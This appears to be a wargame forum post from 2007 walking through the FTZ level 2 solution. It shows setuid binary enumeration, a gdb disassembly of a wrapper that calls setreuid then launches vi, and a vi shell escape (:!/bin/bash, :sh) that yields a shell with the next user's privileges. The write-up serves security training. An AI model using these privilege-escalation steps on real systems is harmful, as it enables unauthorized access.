http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=2433
This is the standard solution for level 2.
Refer to it as needed.
First, find the file that has the level3 setuid bit set.
[level2@ftz level2]$ find / -perm -04000 -group level2 2> /dev/null
/usr/bin/editor
[level2@ftz level2]$ ls -al /usr/bin/editor
-rwsr-x--- 1 level3 level2 22380 Mar 29 2003 /usr/bin/editor
Then, to find out what this file does, sift through the strings inside it.
[level2@ftz level2]$ strings /usr/bin/editor
/lib/ld-linux.so.2
libc.so.6
system
__deregister_frame_info
setreuid
_IO_stdin_used
__libc_start_main
__register_frame_info
__gmon_start__
GLIBC_2.0
PTRh
QVh@
/bin/vi
OSF
Hmm, even at a glance the vi editor shows up. Let's look more closely.
[level2@ftz level2]$ gdb -q /usr/bin/editor
(gdb) disas main
Dump of assembler code for function main:
0x08048440 <main+0>: push %ebp
0x08048441 <main+1>: mov %esp,%ebp
0x08048443 <main+3>: sub $0x8,%esp
0x08048446 <main+6>: sub $0x8,%esp
0x08048449 <main+9>: push $0xbbb <== 3003
0x0804844e <main+14>: push $0xbbb <== 3003
0x08048453 <main+19>: call 0x8048328 <setreuid>
0x08048458 <main+24>: add $0x10,%esp
0x0804845b <main+27>: sub $0xc,%esp
0x0804845e <main+30>: push $0x80484d8 <== "/bin/vi"
0x08048463 <main+35>: call 0x80482f8 <system>
0x08048468 <main+40>: add $0x10,%esp
0x0804846b <main+43>: leave
0x0804846c <main+44>: ret
0x0804846d <main+45>: lea 0x0(%esi),%esi
End of assembler dump.
(gdb) b *0x08048463
Breakpoint 1 at 0x8048463
(gdb) r
Starting program: /usr/bin/editor
Breakpoint 1, 0x08048463 in main ()
(gdb) x/s 0x80484d8
0x80484d8 <_IO_stdin_used+4>: "/bin/vi"
(gdb) q
[level2@ftz level2]$ id
uid=3002(level2) gid=3002(level2) groups=3002(level2)
[level2@ftz level2]$ cat /etc/passwd|grep level3
level3:x:3003:3003:Level 3:/home/level3:/bin/bash
Since hex 0xbbb = decimal 3003,
that is setreuid(3003,3003); followed by
system("/bin/vi");, as you can see.
Simply put, /usr/bin/editor is a wrapper program that runs the vi editor.
While this program is running, it holds level3's privileges.
This program's weakness is that while vi is running, you can use
special commands to execute shell commands or other commands.
As everyone knows, in vi you can press esc + : to enter ex mode, and
after ! you can run any command, so
you can try various things like !/bin/bash, !/bin/ash or !/bin/my-pass and so on.
Some people ask why you have to put the ! in front, saying it worked for them
without it, and in fact that is true: just typing :sh drops you into a shell. But
that is all it does. You can only step out to a shell for a moment; the varied
command execution you get with ! is not possible.
For example, :bash or :my-pass will not work.
If we must distinguish them, :sh has more the feeling of stepping out of vi into a shell
for a moment, while commands that follow :!, such as :!pwd or :!ls, run that command and
use its output directly in the edit, that is, the feeling is more that you never leave
the editor.
So strictly speaking, typing :!sh or :!/bin/bash to get a shell instead of :sh
is wasted typing.
The :! feature was created precisely so you can run various commands without the
hassle of leaving for a shell, and write the result straight into the edit.
Anyway, as hackers we are attacking vi's weak spot regardless of vi's originally
intended function, so either way it makes no difference, haha
Hit : 3380 Date : 2007/07/14 12:24